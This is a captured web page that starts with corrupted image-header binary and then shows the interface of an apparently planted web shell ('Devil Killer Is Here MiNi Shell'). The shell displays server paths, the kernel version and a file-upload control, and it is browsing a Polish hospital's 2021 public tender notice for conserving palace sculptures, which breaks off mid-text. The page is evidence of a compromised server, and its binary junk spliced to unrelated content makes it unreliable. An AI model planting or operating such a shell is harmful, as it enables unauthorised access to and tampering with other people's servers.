JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210603/0007305102-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00073051 z dnia 2021-06-03</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace konserwatorskie rzeźb Diany i Demeter usytuowanych na attyce Pałacu<br/>w Kochcicach wraz z opracowaniem dokumentacji konserwatorskiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Wojewódzki Szpital Chirurgii Urazowej im. dr. Janusza Daaba w Piekarach Śląskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000868307</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@urazowka.piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.urazowka.piekary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace konserwatorskie rzeźb Diany i Demeter usytuowanych na attyce Pałacu<br/>w Kochcicach wraz z opracowaniem dokumentacji konserwatorskiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-32824fb6-c4a9-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00073051</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001938/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Prace konserwatorskie rzeźb Diany i Demeter usytuowanych na attyce Pałacu w Kochcicach wraz z opracowaniem dokumentacji konserwatorskiej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://urazowka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://urazowka.ezamawiajacy.pl<br/><br/>1. Z zastrzeżeniem postanowień zawartych w rozdziale XVI SWZ oraz w ust. 2 i w<br/>ust. 4 niniejszego rozdziału SWZ, komunikacja między Zamawiającym a<br/>Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną (Dz.U. z 2020 r. poz. 344), <br/><br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną<br/>kwalifikowanym podpisem elektronicznym) lub<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym<br/>- wyłącznie poprzez Platformę przetargową.<br/>3. Zamawiający lub Wykonawca przekazując oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, mogą zażądać od drugiej strony niezwłocznego potwierdzenia ich otrzymania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową)<br/>– zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy<br/>przetargowej - dostępnymi pod adresem https://oneplace.marketplanet.pl oraz<br/>zaakceptować regulamin korzystania z Platformy przetargowej.<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o<br/>którym mowa w ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej –<br/>wskazane są na stronie internetowej Platformy przetargowej.<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej<br/>dostawca, tj. Otwarty Rynek Elektroniczny S.A. ul. Domaniewska 49, Trinity Park III<br/>02-672 Warszawa, nr tel. +48 (22) 25 72 223 , e-mail:<br/>https://oneplace.marketplanet.pl od poniedziałku do piątku (dni robocze) w godz.<br/>900 - 1700.<br/>5. Ogólne zasady korzystania z Platformy przetargowej:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>na subdomenie Zamawiającego: https://urazowka.ezamawiajacy.pl lub<br/>https://oneplace.marketplanet.pl;<br/>2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany<br/>do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada<br/>konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”.;<br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację<br/>w procesie złożenia Oferty w postaci elektronicznej; 4) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu;<br/>5) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformy. Za datę przekazania zaświadczeń oraz informacji<br/>przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/><br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki<br/>dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz<br/>zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3<br/>ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”,<br/>przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695,<br/>1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/><br/>7. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego<br/>rozdziału SWZ, przekazywane w postępowaniu o udzielenie zamówienia, sporządza<br/>się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej, wskazanych przez Zamawiającego w niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016r w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (RODO), informuje się że administratorem<br/>Pani/Pana danych osobowych jest Samodzielny Publiczny Wojewódzki Szpital Chirurgii<br/>Urazowej im. dr. Janusza Daaba z siedzibą przy ul. Bytomskiej 62 w Piekarach Śląskich<br/>(kod pocztowy 41-940).<br/>W Szpitalu powołano Inspektora Ochrony Danych, z którym można się skontaktować w<br/>każdej sprawie dotyczącej przetwarzania danych osobowych: e-mail:<br/>abi@urazowka.piekary.pl, tel.: 32 3934309.<br/>Pani/Pana dane osobowe, zawarte w ofertach albo wnioskach o dopuszczenie do<br/>udziału w postępowaniu o udzielenie zamówienia publicznego a także dane znajdujące<br/>się w publicznie dostępnych rejestrach (KRS, CEIDG, KRK), będą przetwarzane w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na „Prace<br/>konserwatorskie rzeźb Diany i Demeter usytuowanych na attyce Pałacu w<br/>Kochcicach wraz z opracowaniem dokumentacji konserwatorskiej”<br/>oznaczenie sprawy (numer referencyjny): SZP.270-19/2021, na podstawie art. 6 ust. 1<br/>lit c. RODO, w związku z obowiązującymi przepisami prawa, w szczególności z ustawą z dnia 11 września 2019 r. prawo zamówień publicznych (dalej „ustawa Pzp”), ustawą z<br/>dnia 23 kwietnia 1964r – Kodeks Cywilny, ustawą z dnia 27 sierpnia 2009 r. o finansach<br/>publicznych. W przypadku wyboru oferty i zawarcia umowy dane zamieszczone w<br/>umowie oraz w dokumentacji z nią związanej, będą przetwarzane w celach związanych<br/>z realizacją umowy, w tym w celu wystawienia faktur, rachunków oraz prowadzenia<br/>sprawozdawczości finansowej na podstawie art. 6 ust. 1 lit b. RODO (przetwarzanie<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą) oraz lit.<br/>c. RODO w związku z obowiązującymi przepisami prawa, w szczególności przepisami<br/>wymienionymi powyżej oraz przepisami ustawy z dnia 29 sierpnia 1997r. ordynacja<br/>podatkowa, ustawy z dnia 29 września 1994 r. o rachunkowości.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek podania danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>Dane osobowe nie będą podlegać zautomatyzowanemu podejmowaniu decyzji lub<br/>profilowaniu.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu i na zasadach określonych o art. 18<br/>oraz art. 74 ustawy Pzp. Ponadto w przypadku wyboru oferty i zawarcia umowy dane<br/>mogą być udostępniane innym podmiotom lub organom upoważnionym na podstawie<br/>przepisów prawa, a także na podstawie umów powierzenia, w szczególności<br/>dostawcom systemów informatycznych i usług IT (w tym do Otwartego Rynku<br/>Elektronicznego S.A. z siedzibą w Warszawie), podmiotom świadczącym usługi<br/>prawnicze, urzędom skarbowym, bankom. Szpital nie zamierza przekazywać danych do<br/>państwa trzeciego lub organizacji międzynarodowych.<br/>Dane osobowe będą przechowywane przez okres 4 lat, licząc od końca roku w którym<br/>zakończono postępowanie o udzielenie zamówienia a jeżeli czas trwania umowy<br/>przekracza 4 lata okres przechowywana obejmuje cały czas trwania umowy. W<br/>przypadku wyboru oferty i zawarcia umowy dane osobowe związane z realizacją umowy<br/>będą przechowywane przez okres 5 lat, licząc od końca roku w którym w którym<br/>nastąpiło wygaśnięcie umowy lub w którym upłynął termin zobowiązania podatkowego. Posiada Pani/Pan prawo dostępu do treści swoich danych, ich sprostowania a także<br/>usunięcia lub ograniczenia przetwarzania na zasadach określonych w przepisach<br/>prawa, w tym RODO.<br/>Skorzystanie przez Panią / Pana z uprawnienia do sprostowania lub uzupełnienia<br/>danych, o którym mowa w art. 16 RODO, nie będzie skutkowało zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa<br/>w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.<br/>Informuje się również o prawie wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, iż przetwarzanie danych osobowych narusza przepisy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.270-19/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane, konserwatorskie przy zabytku wpisanym do rejestru zabytków: Rzeźby Diany i Demeter (Ceres) usytuowanych w ryzalicie środkowym pałacu w Kochcicach, zgodnie z pozwoleniem Wojewódzkiego Urzędu Ochrony Zabytków w Katowicach Delegatura w Częstochowie z dnia 24 stycznia 2020 r. o numerze CZ19/2020<br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SWZ tj.<br/>załącznik nr 4 oraz:<br/>- przedmiar robót - załącznik nr 4a<br/>- specyfikacja techniczna wykonania i odbioru robót budowlanych - załącznik nr 4b<br/>- dokumentacja projektowa - Program prac konserwatorskich dla rzeźb Diany i Demeter<br/>usytuowanych na attyce Pałacu w Kochcicach - załącznik nr 4c </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">92520000-2 - Usługi świadczone przez muzea i w zakresie ochrony obiektów i budynków zabytkowych</p> <p class="mb-0">92522100-7 - Usługi ochrony obiektów historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował<br/>następującymi kryteriami:<br/>a) cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b) okres gwarancji – 40 pkt (waga kryterium wyrażona w punktach).<br/>2. Każdy z Wykonawców w ww. kryterium otrzyma odpowiednią ilość punktów,<br/>wyliczoną<br/>w następujący sposób:<br/>ad. a) cena ofertowa IPc - maksymalnie 60 pkt - wg następującego wzoru:<br/>CN<br/>IPc = ----- x Zc<br/>CB<br/>gdzie poszczególne litery oznaczają:<br/>IPc – liczba punktów w kryterium „cena ofertowa”,<br/>CN – cena ofertowa najniższa spośród wszystkich rozpatrywanych i niepodlegających<br/>odrzuceniu ofert,<br/>CB – cena ofertowa oferty badanej (przeliczanej),<br/>Zc – znaczenie/waga kryterium „cena ofertowa” wyrażone w punktach – 60 pkt.<br/>Uwaga<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u<br/>Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004<br/>r. o podatku od towarów i usług (Dz.U. z 2018 r. poz. 2174, z późn.zm.), dla celów<br/>zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej<br/>ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek<br/>rozliczyć.<br/>Uwaga<br/>Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc<br/>po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje<br/>zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po<br/>przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.<br/>Ad. b) okres gwarancji – IPg ( 40 punktów):<br/>GB<br/>IPg = ----- x Zg<br/>GN<br/>gdzie poszczególne litery oznaczają:<br/>IPc – liczba punktów w kryterium „cena ofertowa”,<br/>GB – zaoferowany okres gwarancji w badanej ofercie,<br/>GN – najdłuższy zaoferowany okres gwarancji spośród złożonych ofert,<br/>Zg – znaczenie/waga kryterium „okres gwarancji” wyrażone w punktach – 40 pkt.<br/>Uwaga<br/>Okres gwarancji nie może być krótszy niż 60 miesięcy pod rygorem odrzucenia oferty i<br/>nie dłuższy niż 300 miesięcy, przy czym okres dłuższy jest punktowany, jak<br/>maksymalny wymagany w swz.<br/>W przypadku braku wskazania okresu gwarancji w formularzu ofertowym, Zamawiający<br/>przyjmie minimalny 60-miesięczny okres gwarancji i przyzna odpowiednią ilość punktów<br/>zgodnie ze wzorem.<br/>Uwaga<br/>Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc<br/>po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje<br/>zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po<br/>przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.<br/>3. W ramach wszystkich wskazanych i opisanych kryteriów, Wykonawca otrzyma<br/>końcową (łączną) ilość punktów wyliczoną w następujący sposób:<br/>KIP = IPc + IPg<br/>gdzie poszczególne symbole oznaczają:<br/>KIP – końcowa ilość punktów,<br/>IPc – ilość punktów uzyskanych w kryterium: cena ofertowa,<br/>IPg – ilość punktów uzyskanych w kryterium: okres gwarancji.<br/>Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu i<br/>przy uwzględnieniu powyższych kryteriów otrzyma najwyższą punktację.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej<br/>ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający<br/>wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>4.1. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze,<br/>Zamawiający wybiera ofertę z najniższą ceną.<br/>4.2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 4.1.<br/>niniejszego rozdziału SWZ, Zamawiający wzywa Wykonawców, którzy złożyli<br/>te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/><br/>Zamawiający uzna za spełniony warunek w tym zakresie, jeżeli<br/>Wykonawca wykaże, że:<br/><br/>1) dysponuje lub będzie dysponować co najmniej 1 osobą posiadającą<br/>uprawnienia do kierowania pracami konserwatorskimi przy zabytku wpisanym do<br/>rejestru zabytków albo samodzielnego wykonania prac konserwatorskich przy<br/>zabytku wpisanym do rejestru zabytków, zgodnie z obowiązującymi przepisami<br/>prawa tj. art. 37a ust. 1 i 2 